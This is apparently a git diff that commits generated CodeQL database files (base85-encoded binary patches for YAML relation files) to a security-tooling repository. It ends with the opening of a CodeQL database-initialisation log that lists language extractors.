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 TopqiKb15e+`E{fHbItz;K!jeg literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/yaml.rel.checksum b/db/db-yaml/default/yaml.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..de6f34140970bfaacb1acf652a352d65a8f5675c GIT binary patch literal 12 ScmZQzU|?hb0{$OcwgLbJRswPW literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/yaml_locations.rel b/db/db-yaml/default/yaml_locations.rel new file mode 100644 index 0000000000000000000000000000000000000000..f46747ec341818ba278ef400b576bde6966ce296 GIT binary patch literal 11128 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 literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/yaml_scalars.rel b/db/db-yaml/default/yaml_scalars.rel new file mode 100644 index 0000000000000000000000000000000000000000..aa10fbd1a3ab8b089f766b6e623ff699b1dc88ff GIT binary patch literal 12540 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 Initializing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. +[2024-03-01 13:05:58] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:58] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson +[2024-03-01 13:05:58] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/.codeqlmanifest.json +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml/codeql-extractor.yml. 
+[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby/codeql-extractor.yml. 
+[2024-03-01 13:05:58] Plumbing command codeql resolve languages completed: + { + "aliases" : { + "c" : "cpp", + "c++" : "cpp", + "c-c++" : "cpp", + "c-cpp" : "cpp", + "c#" : "csharp", + "java-kotlin" : "java", + "kotlin" : "java", + "javascript-typescript" : "javascript", + "typescript" : "javascript" + }, + "extractors" : { + "go" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go" + } + ], + "python" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python", + "extractor_options" : { + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Python extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + }, + "python_executable_name" : { + "title" : "Controls the name of the Python executable used by the Python extractor.", + "description" : "The Python extractor uses platform-dependent heuristics to determine the name of the Python executable to use. Specifying a value for this option overrides the name of the Python executable used by the extractor. Accepted values are py, python and python3. 
